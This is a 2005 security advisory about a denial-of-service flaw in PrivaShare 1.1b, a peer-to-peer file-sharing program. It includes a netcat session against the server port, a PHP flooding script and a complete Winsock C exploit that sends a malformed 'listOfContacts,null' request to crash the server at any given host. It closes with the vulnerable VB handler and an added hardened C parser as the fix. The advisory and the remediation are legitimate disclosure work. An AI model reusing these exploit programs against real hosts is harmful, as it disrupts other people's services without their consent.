Update:
17:23 05/07/2005
Subject:
" PrivaShare TCP/IP DoS Exploit "
Vulnerable version:
PrivaShare 1.1b
- Affected to lastest version
Operating System:
- WINDOWS 98
- WINDOWS NT
- WINDOWS XP
- WINDOWS 2000
Description:
The program is a peer-to-peer TCP/IP application that lets you share files from a directory of your choice,
download files from other machines running the program to a directory of your choice, upload files
to others, chat with whoever is connected to you, and search for files on other machines running the
application.
Vulnerability:
By sending a specially malformed request to the program it is possible to cause it to crash.
The protocol commands listed below can also be sent directly to the server's listening port, and the
server executes them as they arrive.
Example:
E:\>nc -v localhost 2001            (2001 is the application's default server port)
Infam0us-Gr0up [127.0.0.1] 2001 (?) open
myInfo,Newbie,127.0.0.1,yes,0,null
[command]                           (only the commands listed below are accepted by the server)
myInfo    = information about the client currently connected to the server
Newbie    = user account name on the server
127.0.0.1 = local IP
yes       = share permission; 'no' means the administrator has blocked file transfers
0,null    = output line
Use the command 'print,[text]' to send a text message to the server application.
<?php
$url = "localhost";
$port = 2001;                                   // default PrivaShare server port
$command = "print,FLOOD..FLOOD..FLOOD..FLOOD..FLOOD..FLOOD"; // text to send to the server
$fp = fsockopen($url, $port, $errno, $errstr, 30);
if (!$fp) {
    echo "$errstr ($errno)\n";
} else {
    stream_set_timeout($fp, 5);                 // the server may never close the socket
    fwrite($fp, $command);
    while (!feof($fp)) {
        $line = fgets($fp, 1024);
        if ($line === false) break;             // timeout or read error: stop waiting
        echo $line;
    }
    fclose($fp);
}
?>
Commands available:
myInfo          = connect to the server application as 'myInfo'
requestContacts = refresh a connection to see who they are connected to
listOfContacts  = receive the contact list from a connection
showFiles       = list files
uploadingFile   = upload a file
print,          = send a message to the server, example: 'print,HAI...dude?'
More commands are available; you can find them yourself.
Exploit:
/*
PrivaShare TCP/IP DoS Exploit
----------------------------------------
Resolve host... [OK]
[+] Connecting... [OK]
Target locked
Sending bad procedure... [OK]
[+] Server DoS'ed
Tested on Windows2000 SP4
Greets: Infam0us Gr0up Team/members, and all of you.. take care!
Info:
- infamous.2hell.com
- basher13@linuxmail.org
*/
#include <string.h>
#include <stdlib.h>  /* atoi, exit */
#include <stdio.h>
#include <winsock2.h>
#pragma comment(lib, "ws2_32.lib")
char doscore[] =
/*
"listOfContacts" as stored in the PrivaShare binary (UTF-16LE, offset 0x0000ca10 to 0x0000ca2b):
0000ca10 6c 00 69 00 73 00 74 00 4f 00 66 00 43 00
         6f 00 6e 00 74 00 61 00 63 00 74 00 73 00
*/
"listOfContacts,null"
"*** PrivaShare TCP/IP DoS Exploit \n"
"***-----------------------------------------------\n"
"*** Infam0us Gr0up - Securiti Research Team \n\n"
"***DOS ATTACK! DOS ATTACK! DOS ATTACK! DOS ATTACK!\n"
"***DOS ATTACK! DOS ATTACK! DOS ATTACK! DOS ATTACK!\n"
"***DOS ATTACK! DOS ATTACK! DOS ATTACK! DOS ATTACK!\n"
"***DOS ATTACK! DOS ATTACK! DOS ATTACK! DOS ATTACK!\n"
"***DOS ATTACK! DOS ATTACK! DOS ATTACK! DOS ATTACK!\n"
"***DOS ATTACK! DOS ATTACK! DOS ATTACK! DOS ATTACK!\n"
"***DOS ATTACK! DOS ATTACK! DOS ATTACK! DOS ATTACK!\n"
"***DOS ATTACK! DOS ATTACK! DOS ATTACK! DOS ATTACK!\n"
"***DOS ATTACK! DOS ATTACK! DOS ATTACK! DOS ATTACK!\n"
"***DOS ATTACK! DOS ATTACK! DOS ATTACK! DOS ATTACK!\n"
"***DOS ATTACK! DOS ATTACK! DOS ATTACK! DOS ATTACK!\n"
"***DOS ATTACK! DOS ATTACK! DOS ATTACK! DOS ATTACK!\n"
"***DOS ATTACK! DOS ATTACK! DOS ATTACK! DOS ATTACK!\n"
"***DOS ATTACK! DOS ATTACK! DOS ATTACK! DOS ATTACK!\n";
int main(int argc, char *argv[])
{
WSADATA wsaData;
WORD wVersionRequested;
struct hostent *pTarget;
struct sockaddr_in sock;
char *target;
int port;
SOCKET inetdos;
if (argc < 2)
{
printf(" PrivaShare TCP/IP DoS Exploit \n");
printf(" ------------------------------------------\n");
printf(" Infam0us Gr0up - Securiti Research\n\n");
printf("[-]Usage: %s [target] [port]\n", argv[0]);
printf("[?]Example: %s localhost 2001\n", argv[0]);
exit(1);
}
wVersionRequested = MAKEWORD(1, 1);
/* WSAStartup returns a non-zero error code on failure, never a negative value */
if (WSAStartup(wVersionRequested, &wsaData) != 0) return -1;
target = argv[1];
port = 2001; /* PrivaShare default server port */
if (argc >= 3) port = atoi(argv[2]);
inetdos = socket(AF_INET, SOCK_STREAM, 0);
if(inetdos==INVALID_SOCKET)
{
printf("Socket ERROR \n");
exit(1);
}
printf(" PrivaShare TCP/IP DoS Exploit \n", argv[0]);
printf(" ------------------------------------------\r\n\n", argv[0]);
printf("Resolve host... ");
if ((pTarget = gethostbyname(target)) == NULL)
{
printf("FAILED \n", argv[0]);
exit(1);
}
printf("[OK]\n ");
memcpy(&sock.sin_addr.s_addr, pTarget->h_addr, pTarget->h_length);
sock.sin_family = AF_INET;
sock.sin_port = htons((USHORT)port);
printf("[+] Connecting... ");
if ( (connect(inetdos, (struct sockaddr *)&sock, sizeof (sock) )))
{
printf("FAILED\n");
exit(1);
}
printf("[OK]\n");
printf("Target locked\n");
printf("Sending bad procedure... ");
if (send(inetdos, doscore, sizeof(doscore)-1, 0) == -1)
{
printf("ERROR\n");
closesocket(inetdos);
exit(1);
}
printf("[OK]\n ");
printf("[+] Server DoS'ed\n");
closesocket(inetdos);
WSACleanup();
return 0;
}
Solution:
Fix the check in the following handler in 'frmMain.frm' so that the application stays alive
when it receives such a request:
Private Sub Winsock1_DataArrival(Index As Integer, ByVal bytesTotal As Long)
(..)
cutString strCut, Incoming 'Take out the first string to see if there is info coming.
Incoming = strCut & "," & Incoming 'Then put it back in to be compatible with the sub call.
If strCut > 0 Then 'Compares a string with a number: a non-numeric first field such as "listOfContacts" raises a Type Mismatch run-time error here, and unhandled, that error terminates the program.
getConnections Index, Incoming
End If
(..)
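A hardened counterpart to the DataArrival handler above, written here in C as an added example and not taken from the PrivaShare source: the request line is copied into a bounded buffer, split on commas the way cutString does, checked against the command list given earlier in this advisory, and the field the original compares with 0 is validated as a decimal number instead, so "listOfContacts,null" and over-long "print," floods come back as error codes rather than a crash. The 256-byte line bound, the per-command field rules, and the reading of that field as a numeric count are assumptions made for the example, not documented PrivaShare behaviour; the sample inputs are constructed from the lines shown in this advisory.

```c
/* ps_guard.c - bounded parser and allow-list dispatcher for PrivaShare-style
 * "command,arg1,arg2,..." request lines. Added example, not the vendor's code;
 * the field rules below are assumptions drawn from the advisory's samples. */
#include <ctype.h>
#include <stdio.h>
#include <string.h>

#define PS_MAX_LINE   256   /* assumed bound; the VB original has none */
#define PS_MAX_FIELDS 8

enum ps_result {
    PS_OK = 0,            /* allow-listed command with well-formed arguments */
    PS_TOO_LONG,          /* request exceeds the fixed buffer; refused, not copied */
    PS_EMPTY,             /* nothing before the first comma */
    PS_UNKNOWN_COMMAND,   /* command is not in the allow-list */
    PS_BAD_ARGUMENT       /* an argument failed its format check */
};

/* Commands taken from the advisory's list; anything else is refused. */
static const char *const ps_commands[] = {
    "myInfo", "requestContacts", "listOfContacts", "showFiles", "uploadingFile", "print"
};
#define PS_NUM_COMMANDS (sizeof ps_commands / sizeof ps_commands[0])

/* Split buf in place on commas into at most max fields; returns the count. */
static int ps_split(char *buf, char *fields[], int max)
{
    int n = 0;
    char *p = buf;
    while (n < max) {
        char *comma;
        fields[n++] = p;
        comma = strchr(p, ',');
        if (comma == NULL)
            break;
        *comma = '\0';
        p = comma + 1;
    }
    return n;
}

/* 1 if s is 1..9 decimal digits, else 0. This replaces the VB "strCut > 0"
 * comparison, which raises a Type Mismatch on non-numeric text. */
static int ps_is_uint(const char *s)
{
    size_t len = strlen(s);
    if (len == 0 || len > 9)
        return 0;
    for (; *s; s++)
        if (!isdigit((unsigned char)*s))
            return 0;
    return 1;
}

enum ps_result ps_handle_request(const char *line)
{
    char buf[PS_MAX_LINE];
    char *fields[PS_MAX_FIELDS];
    size_t len = strlen(line), i;
    int n;

    if (len >= sizeof buf)
        return PS_TOO_LONG;
    memcpy(buf, line, len + 1);
    while (len > 0 && (buf[len - 1] == '\n' || buf[len - 1] == '\r'))
        buf[--len] = '\0';                       /* tolerate netcat-style CRLF */

    n = ps_split(buf, fields, PS_MAX_FIELDS);
    if (n == 0 || fields[0][0] == '\0')
        return PS_EMPTY;
    for (i = 0; i < PS_NUM_COMMANDS; i++)        /* exact, case-sensitive match */
        if (strcmp(fields[0], ps_commands[i]) == 0)
            break;
    if (i == PS_NUM_COMMANDS)
        return PS_UNKNOWN_COMMAND;

    if (strcmp(fields[0], "myInfo") == 0) {
        /* myInfo,<name>,<ip>,<yes|no>,<count>,<output>, as in the advisory's sample */
        if (n < 6 || fields[1][0] == '\0' || !ps_is_uint(fields[4]))
            return PS_BAD_ARGUMENT;
        if (strcmp(fields[3], "yes") != 0 && strcmp(fields[3], "no") != 0)
            return PS_BAD_ARGUMENT;
    } else if (strcmp(fields[0], "listOfContacts") == 0) {
        /* the crashing handler compares the cut field with 0; demand a real number */
        if (n < 2 || !ps_is_uint(fields[1]))
            return PS_BAD_ARGUMENT;
    } else if (strcmp(fields[0], "print") == 0) {
        if (n < 2 || fields[1][0] == '\0')
            return PS_BAD_ARGUMENT;
    }
    return PS_OK;
}

/* Constructed sample: the exploit's padding pattern repeated past the bound (312 bytes). */
#define PS_FLOOD "***DOS ATTACK! DOS ATTACK! DOS ATTACK! DOS ATTACK!\n"
const char ps_sample_flood[] = "print," PS_FLOOD PS_FLOOD PS_FLOOD PS_FLOOD PS_FLOOD PS_FLOOD;

int main(void)
{
    /* constructed inputs: the advisory's own lines plus malformed ones */
    const char *samples[] = { "myInfo,Newbie,127.0.0.1,yes,0,null", "listOfContacts,null",
                              "listOfContacts,3\r\n", "print,HAI...dude?", "shutdown,now",
                              "", ps_sample_flood };
    size_t k;
    for (k = 0; k < sizeof samples / sizeof samples[0]; k++)
        printf("sample %u -> result %d\n", (unsigned)k, (int)ps_handle_request(samples[k]));
    return 0;
}
```

Compiled with any C compiler (cc ps_guard.c), the program prints one result code per constructed sample; in a real handler the non-OK codes would translate to dropping the line or closing the connection, never to an unhandled run-time error.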
Vendor URL:
WWW - http://www.freevbcode.com/ShowCode.Asp?ID=2742
Email - geno@localaccess.com
Published by:
basher13 (Infam0us Gr0up - Securiti Research)
basher13@linuxmail.org / infamous.2hell.com